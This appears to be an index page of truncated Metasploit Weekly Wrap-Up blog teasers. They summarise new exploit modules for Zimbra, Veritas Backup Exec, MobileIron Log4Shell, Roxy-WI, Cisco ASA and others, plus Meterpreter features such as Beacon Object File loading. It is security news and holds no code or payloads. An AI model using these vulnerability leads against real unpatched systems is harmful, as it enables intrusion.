3 min
Metasploit
Metasploit Weekly Wrap-Up
Zimbra with Postfix LPE (CVE-2022-3569)
This week rbowes [https://github.com/rbowes-r7] added an LPE exploit for Zimbra
with Postfix. The exploit leverages a vulnerability whereby the Zimbra user can
run postfix as root which in turn is capable of executing arbitrary
shellscripts. This can be abused for reliable privilege escalation from the
context of the zimbra service account to root. As of this time, this
vulnerability remains unpatched.
Zimbra RCE (CVE-2022-41352)
rbowes [https://github.co
2 min
Metasploit Weekly Wrapup
Metasploit Wrap-Up
Remote code execution modules for Spring Cloud Function and pfSense, plus bug fixes for the Windows secrets dump module.
5 min
Metasploit
Metasploit Weekly Wrap-Up
Bofloader - Windows Meterpreter Gets Beacon Object File Loader Support
This week brings a new and frequently requested feature to the Windows
Meterpreter, the Beacon Object File loader. This new extension, bofloader,
allows for users to execute Beacon Object Files as written for either Cobalt
Strike or Sliver. This extension was provided by a group effort among community
members kev169 [https://github.com/kev169], GuhnooPlusLinux
[https://twitter.com/GuhnooPlusLinux], R0wdyJoe [https://twitter.c
2 min
Metasploit
Metasploit Weekly Wrap-Up
Veritas Backup Exec Agent RCE
This module kindly provided by c0rs [https://github.com/c0rs] targets the
Veritas Backup Exec Agent in order to gain RCE as the system/root user.
The exploit itself is actually a chain of 3 separate CVEs (CVE-2021-27876,
CVE-2021-27877 and CVE-2021-27878) which only makes it more impressive.
While you're patching, why not take the time to test your backups too.
Hikvision IP Camera user impersonation
This vulnerability has been present in Hikvision products since 20
4 min
Metasploit
Metasploit Weekly Wrap-Up
Have you built out that awesome media room?
If your guilty pleasures include using a mobile device to make your home
entertainment system WOW your guests, you might be using Unified Remote
[https://www.unifiedremote.com/]. I hope you are extra cautious about what
devices you let on that WiFi network. A prolific community member h00die
[https://github.com/h00die] added a module this week that uses a recently
published vulnerability from H4RK3NZ0 [https://github.com/H4rk3nz0] to leverage
an unprot
5 min
Metasploit
Metasploit Weekly Wrap-Up
BYOS: Bring your own stager
We try hard to make sure we have a great choice of fully-functional payloads to
choose from, but sometimes you might want to “branch” out on your own, and if
that’s the case we’ve got you covered. In an attempt to make Metasploit play
well with others, we’ve introduced a brand new payload type: “custom.” “Custom”
payloads use Metasploit stagers to build a stager that will stage whatever
shellcode you send it.
Got a third-party payload you want to run like Sliver or a
3 min
Metasploit
Metasploit Weekly Wrap-Up
Authenticated command injection vulnerability of Cisco ASA-X with FirePOWER
Services:
jbaines-r7 [https://github.com/jbaines-r7] added a new module that exploits an
authenticated command injection vulnerability CVE-2022-20828
[https://attackerkb.com/topics/wfvCFXXw2e/cve-2022-20828?referrer=blog] of Cisco
ASA-X with FirePOWER Services. This vulnerability affects all Cisco ASA
appliances that support ASA FirePOWER module. Note that, although a patch has
been added to most recent ASA FirePOWER mod
4 min
Metasploit
Metasploit Weekly Wrap-Up
ICPR Certificate Management
This week Metasploit has a new ICPR Certificate Management module from Oliver
Lyak [https://github.com/ly4k] and our very own Spencer McIntyre
[https://github.com/zeroSteiner], which can be utilized for issuing certificates
via Active Directory Certificate Services. It has the capability to issue
certificates which is useful in a few contexts including persistence, ESC1
[https://posts.specterops.io/certified-pre-owned-d95910965cd2] and as a
primitive necessary for exp
3 min
Metasploit
Metasploit Wrap-Up
Zimbra Auth Bypass to Shell
Ron Bowes [https://github.com/rbowes-r7] added an exploit module
[https://github.com/rapid7/metasploit-framework/pull/16922] that targets
multiple versions of Zimbra Collaboration Suite. The module leverages an
authentication bypass (CVE-2022-37042) and a directory traversal vulnerability
(CVE-2022-27925) to gain code execution as the zimbra user. The auth bypass
functionality correctly checks for a valid session; however, the function that
performs the check does not
3 min
Metasploit
Metasploit Wrap-Up
Advantech iView NetworkServlet Command Injection
This week Shelby Pace [https://github.com/space-r7] has developed a new exploit
module for CVE-2022-2143
[https://attackerkb.com/topics/XYFOEYsgKa/cve-2022-2143?referrer=blog]. This
module uses an unauthenticated command injection vulnerability to gain remote
code execution against vulnerable versions of Advantech iView software below
5.7.04.6469. The software runs as NT AUTHORITY\SYSTEM, granting the module user
unauthenticated privileged access
3 min
Metasploit Weekly Wrapup
Metasploit Weekly Wrap-Up
Putting in the work!
This week we’re extra grateful for the fantastic contributions our community
makes to Metasploit. The Metasploit team landed more than 5 PRs each from Ron
Bowes [https://github.com/rbowes-r7] and bcoles [https://github.com/bcoles],
adding some great new capabilities.
Ron Bowes [https://github.com/rbowes-r7] contributed four new modules targeting
UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit
users some excellent new vectors to leverage against
3 min
Metasploit
Metasploit Weekly Wrap-Up
Log4Shell in MobileIron Core
Thanks to jbaines-r7 [https://github.com/jbaines-r7] we have yet another
Log4Shell exploit [https://github.com/rapid7/metasploit-framework/pull/16837].
Similar to the other Log4Shell exploit modules, the exploit works by sending a
JNDI string that once received by the server will be deserialized, resulting in
unauthenticated remote code execution as the tomcat user. Vulnerable versions of
MobileIron Core have been reported as exploited
[https://www.mandiant.com/resou
4 min
Metasploit
Metasploit Weekly Wrap-Up
Roxy-WI Unauthenticated RCE
This week, community member Nuri Çilengir [https://github.com/ncilengir] added
an unauthenticated RCE for Roxy-WI. Roxy-WI is an interface for managing
HAProxy, Nginx and Keepalived servers. The vulnerability can be triggered by a
specially crafted POST request to a Python script where the ipbackend parameter
is vulnerable to OS command injection. The result is reliable code execution
within the context of the web application user.
Fewer Meterpreter Scripts
Community
3 min
Metasploit
Metasploit Weekly Wrap-Up
The past, present and future of Metasploit
Don't miss Spencer McIntyre's talk on the Help Net Security's blog
[https://www.helpnetsecurity.com/2022/07/20/past-present-future-metasploit-video/]
. Spencer is the Lead Security Researcher at Rapid7 and speaks about how
Metasploit has evolved since its creation back in 2003. He also explains how the
Framework is addressing today's offensive security challenges and how important
is the partnership with the community.
LDAP swiss army knife
This week,
3 min
Metasploit
Metasploit Weekly Wrap-Up
JBOSS EAP/AS - More Deserializations? Indeed!
Community contributor Heyder Andrade [https://github.com/heyder] added in a new
module for a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified
Invoker interface for versions 6.1.0 and prior. As far as we can tell this was
first disclosed by Joao Matos [https://github.com/joaomatosf] in his paper at
AlligatorCon
[https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf].
Later a PoC from Marcio Almeida [https://twit